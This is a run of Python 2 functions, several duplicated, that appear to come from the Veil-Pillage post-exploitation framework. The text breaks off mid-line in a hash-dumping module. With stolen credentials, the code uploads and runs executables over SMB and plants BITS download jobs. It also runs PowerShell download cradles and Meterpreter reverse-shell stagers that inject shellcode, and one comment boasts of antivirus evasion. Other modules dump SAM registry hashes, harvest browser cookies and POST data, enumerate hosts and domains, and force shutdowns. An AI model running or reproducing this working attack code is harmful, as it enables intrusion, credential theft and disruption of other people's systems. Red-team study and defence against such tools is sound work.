def run(self): # assume single set of credentials username, password = self.creds[0] # grab our options triggerMethod = self.required_options["trigger_method"][0] out_file = self.required_options["out_file"][0] args = self.required_options["args"][0] if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # command to invoke netview and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/netview.exe" # the command to invoke netview.exe cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file # see if there are any extra arguments we want to add in if args != "none": cmd = cmd + " " + args for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute netview.exe command_methods.executeCommand(target, username, password, cmd, triggerMethod) self.output += "[*] netview.exe uploaded and executed using creds '"+username+":"+password+"' on "+target+" using "+triggerMethod+"\n"
def run(self): # assume single set of credentials username, password = self.creds[0] exe_url = self.required_options["exe_url"][0] interval = self.required_options["interval"][0] job_name = self.required_options["job_name"][0] triggerMethod = "winexe" # create the bitsadmin job, set the retry interval, kick everything off cmd = "bitsadmin /create " + job_name + " & bitsadmin /addfile " + job_name + " " + exe_url + " C:\Windows\Temp\updater.exe & bitsadmin /SETNOTIFYCMDLINE " + job_name + " C:\Windows\Temp\updater.exe NULL & bitsadmin /SETMINRETRYDELAY " + job_name + " " + str( int(interval) * 60) + " & bitsadmin /resume " + job_name # bitsadmin cleanup -> cancel this specific job cleanupCMD = "bitsadmin /cancel " + job_name for target in self.targets: self.output += "[*] Bitsadmin job started with url " + exe_url + " using creds '" + username + ":" + password + "' on " + target + "\n" command_methods.executeCommand(target, username, password, cmd, triggerMethod=triggerMethod) self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""): """ Take a particular exe at "exePath" path and uploads it to each target in targets, using the specified username and password. The specified triggerMethod (default wmis) is then used to trigger the uploaded executable. """ # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # randomize the uploaded .exe file name uploadFileName = helpers.randomString() + ".exe" # copy the payload to the random hostedFileName in the temp directory os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/"+uploadFileName) # command to trigger the uploaded executable cmd = "C:\\Windows\\Temp\\"+uploadFileName+" "+exeArgs for target in targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR+"/"+uploadFileName, 5) # execute the trigger command command_methods.executeCommand(target, username, password, cmd, triggerMethod) # return the randomized name in the calling method later wants # to clean the processes up return uploadFileName
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n" else: self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] # grab our options triggerMethod = self.required_options["trigger_method"][0] out_file = self.required_options["out_file"][0] args = self.required_options["args"][0] if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # command to invoke netview and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe" # the command to invoke netview.exe cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file # see if there are any extra arguments we want to add in if args != "none": cmd = cmd + " " + args for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute netview.exe command_methods.executeCommand(target, username, password, cmd, triggerMethod) self.output += "[*] netview.exe uploaded and executed using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"
def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""): """ Spins up an Impacket SMB server and hosts the binary specified by exePath. The specified triggerMethod (default wmis) is then used to invoke a command with the UNC path "\\localHost\\exe" which will invoke the specified executable purely in memory. Note: this evades several AV vendors, even with normally disk-detectable executables #avlol :) This takes 'targets' instead of a single 'target' since we don't want to set up and tear down the local SMB server every time. """ # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # randomize the hosted .exe file name hostedFileName = helpers.randomString() + ".exe" # make the tmp hosting directory if it doesn't already exist if not os.path.exists(settings.TEMP_DIR + "shared/"): os.makedirs(settings.TEMP_DIR + "shared/") # copy the payload to the random hostedFileName in the temp directory os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/shared/" + hostedFileName) # spin up the SMB server server = smb.ThreadedSMBServer() server.start() time.sleep(.5) # build the UNC path back to our host and executable and any specified arguments cmd = "\\\\" + localHost + "\\system\\" + hostedFileName+" "+exeArgs for target in targets: # execute the UNC command for each target command_methods.executeCommand(target, username, password, cmd, triggerMethod) print helpers.color("\n [*] Giving time for commands to trigger...") # sleep so the wmis/winexe commands can trigger and the target # can grab the .exe from the SMB server time.sleep(10) # shut the smb server down server.shutdown() # remove the temporarily hosted files os.system("rm -rf " + settings.TEMP_DIR+"/shared/") # not sure if need to do this to kill off the smb server... # os.kill(os.getpid(), signal.SIGINT) ? # return the randomized name in the calling method later wants # to clean the processes up return hostedFileName
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # create our powershell payload p = virtual.Payload() # pull out any msfpayload payloads/options if self.args.msfpayload: p.shellcode.SetPayload( [self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: p.shellcode.setCustomShellcode(self.args.custshell) # get the powershell command powershellCommand = p.generate() # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn the payload shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(p.shellcode) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") for target in self.targets: print helpers.color(" [*] Triggering powershell command on " + target) # execute the powershell command on each host command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod) self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n" # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # create our powershell payload p = virtual.Payload() # pull out any msfpayload payloads/options if self.args.msfpayload: p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: p.shellcode.setCustomShellcode(self.args.custshell) # get the powershell command powershellCommand = p.generate() # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn the payload shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(p.shellcode) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") for target in self.targets: print helpers.color(" [*] Triggering powershell command on "+target) # execute the powershell command on each host command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod) self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n" # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to shutdown a machine immediately command = "shutdown -t 0 -s -f" result = command_methods.executeCommand(target, username, password, command, triggerMethod) if "success" in result: self.output += ( "[*] Shutdown command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n" ) else: self.output += ( "[!] Shutdown command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n" )
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] outFile = self.required_options["out_file"][0] if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" %{"p":outFile} # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for "systeminfo" to run print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out) self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False): """ Trigger a specific url to download a powershell script from. url - the full url (http/https) to download the second stage script from scriptArguments - the arguments to pass to the script we're invoking outFile - if you want to the script to output to a file for later retrieval, put a path here noArch - don't do the arch-independent launcher """ # this surpasses the length-limit implicit to smbexec I'm afraid :( if triggerMethod.lower() == "smbexec": print helpers.color( "\n\n [!] Error: smbexec will not work with powershell invocation", warning=True) raw_input(" [*] press any key to return: ") return "" # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # if the url doesn't start with http/https, assume http if not url.lower().startswith("http"): url = "http://" + url if scriptArguments.lower() == "none": scriptArguments = "" # powershell command to download/execute our secondary stage, # plus any scriptArguments we want to tack onto execution (i.e. PowerSploit) # for https, be sure to turn off warnings for self-signed certs in case we're hosting if url.lower().startswith("https"): downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('" + url + "');" + scriptArguments else: downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('" + url + "');" + scriptArguments # get the encoded powershell command triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch) # if we want to get output from the final execution, append it if outFile: triggerCMD += " > " + outFile # execute the powershell trigger command on each target for target in targets: print "\n [*] Executing command on " + target out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""): """ Take a particular exe at "exePath" path and uploads it to each target in targets, using the specified username and password. The specified triggerMethod (default wmis) is then used to trigger the uploaded executable. """ # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # randomize the uploaded .exe file name uploadFileName = helpers.randomString() + ".exe" # copy the payload to the random hostedFileName in the temp directory os.system("cp " + exePath + " /" + settings.TEMP_DIR + "/" + uploadFileName) # command to trigger the uploaded executable cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs for target in targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR + "/" + uploadFileName, 5) # execute the trigger command command_methods.executeCommand(target, username, password, cmd, triggerMethod) # return the randomized name in the calling method later wants # to clean the processes up return uploadFileName
def run(self): # assume single set of credentials username, password = self.creds[0] exe_url = self.required_options["exe_url"][0] interval = self.required_options["interval"][0] job_name = self.required_options["job_name"][0] triggerMethod = "winexe" # create the bitsadmin job, set the retry interval, kick everything off cmd = "bitsadmin /create "+job_name+" & bitsadmin /addfile "+job_name+" "+exe_url+" C:\Windows\Temp\updater.exe & bitsadmin /SETNOTIFYCMDLINE "+job_name+" C:\Windows\Temp\updater.exe NULL & bitsadmin /SETMINRETRYDELAY "+job_name+" "+str(int(interval)*60) + " & bitsadmin /resume "+job_name # bitsadmin cleanup -> cancel this specific job cleanupCMD = "bitsadmin /cancel "+job_name for target in self.targets: self.output += "[*] Bitsadmin job started with url "+exe_url+" using creds '"+username+":"+password+"' on " + target + "\n" command_methods.executeCommand(target, username, password, cmd, triggerMethod=triggerMethod) self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand( target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n" else: self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to force the logoff of the first user result from "query user" command = "logoff 1" result = command_methods.executeCommand(target, username, password, command, triggerMethod) if "success" in result: self.output += "[*] Logoff command successfully triggered using creds '"+username+":"+password+"' on : " + target + "\n" else: self.output += "[!] Logoff command unsuccessful using creds '"+username+":"+password+"' on : " + target + "\n"
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False): """ Trigger a specific url to download a powershell script from. url - the full url (http/https) to download the second stage script from scriptArguments - the arguments to pass to the script we're invoking outFile - if you want to the script to output to a file for later retrieval, put a path here noArch - don't do the arch-independent launcher """ # this surpasses the length-limit implicit to smbexec I'm afraid :( if triggerMethod.lower() == "smbexec": print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True) raw_input(" [*] press any key to return: ") return "" # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # if the url doesn't start with http/https, assume http if not url.lower().startswith("http"): url = "http://" + url if scriptArguments.lower() == "none": scriptArguments = "" # powershell command to download/execute our secondary stage, # plus any scriptArguments we want to tack onto execution (i.e. PowerSploit) # for https, be sure to turn off warnings for self-signed certs in case we're hosting if url.lower().startswith("https"): downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments else: downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments # get the encoded powershell command triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch) # if we want to get output from the final execution, append it if outFile: triggerCMD += " > " + outFile # execute the powershell trigger command on each target for target in targets: print "\n [*] Executing command on "+target out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to shutdown a machine immediately command = "shutdown -t 0 -s -f" result = command_methods.executeCommand(target, username, password, command, triggerMethod) if "success" in result: self.output += "[*] Shutdown command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] Shutdown command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to force the logoff of the first user result from "query user" command = "logoff 1" result = command_methods.executeCommand(target, username, password, command, triggerMethod) if "success" in result: self.output += "[*] Logoff command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] Logoff command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] outFile = self.required_options["out_file"][0] # wmis doesn't like net * /domain commands >_< triggerMethod = "winexe" if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % { "p": outFile } # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for commands to run print helpers.color( "\n [*] Waiting 20 seconds for enumeration commands to run on '" + target + "'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out) self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] outFile = self.required_options["out_file"][0] # wmis doesn't like net * /domain commands >_< triggerMethod = "winexe" if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile} # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for commands to run print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out) self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] stager = self.required_options["stager"][0] lhost = self.required_options["lhost"][0] lport = self.required_options["lport"][0] spawnHandler = self.required_options["spawn_handler"][0] # start building the handler in case we want to invoke it handler = "use exploit/multi/handler" # the pure powershell windows/meterpreter/reverse_tcp stager revTCPStager = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); "@ try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) $s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0 $y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,32,[System.Net.Sockets.SocketFlags]::None) } for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]} $t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40) [System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length) $t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport) # the pure powershell windows/meterpreter/reverse_http stager revHTTPStager = """$q = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); "@ try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray() function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)} function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;} function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}} function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";} $m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)") $n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" ) $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length) $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport) # the pure powershell windows/meterpreter/reverse_https stager revHTTPSStager = """$q = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); "@ try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray() function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)} function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;} function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}} function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient; $m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" ) $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length) $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport) # get the encoded powershell trigger command if stager.lower() == "rev_tcp": triggerCMD = helpers.encPowershell(revTCPStager) handler += "\nset PAYLOAD windows/meterpreter/reverse_tcp" elif stager.lower() == "rev_http": triggerCMD = helpers.encPowershell(revHTTPStager) handler += "\nset PAYLOAD windows/meterpreter/reverse_http" elif stager.lower() == "rev_https": triggerCMD = helpers.encPowershell(revHTTPSStager) handler += "\nset PAYLOAD windows/meterpreter/reverse_https" else: print helpers.color("\n [!] Stager not recognized: please enter rev_tcp, rev_http, or rev_https\n", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # finish off the handler and write it to the tmp directory handler += "\nset LHOST " + lhost handler += "\nset LPORT " + lport handler += "\nset ExitOnSession false" handler += "\nexploit -j\n" f = open('/tmp/handler.rc', 'w') f.write(handler) f.close() # build and spawn a handler for the invoked payload if spawnHandler.lower() == "true": handlerPath = "/tmp/handler.rc" # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # execute the powershell trigger command on each target for target in self.targets: # trigger the command and set output as appropriate print "\n [*] Triggering powershell stager '"+stager.lower()+"' with lhost="+lhost+" and lport="+lport+" on "+target self.output += "[*] Triggering powershell stager '"+stager.lower()+"' with lhost="+lhost+" and lport="+lport+" using creds '"+username+":"+password+"' on "+target+"\n" command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod) # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # let's keep track of ALL hashes found allHashes = "" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" for target in self.targets: print helpers.color("\n [*] Dumping hashes on " + target) # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) error = False if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open('/tmp/system', 'w') f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/security', 'w') f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open('/tmp/sam', 'w') f.write(samFile) f.close() if not error: # get all the hashes from these hives hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # add the hashes to our global list allHashes += hashes # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes) self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + 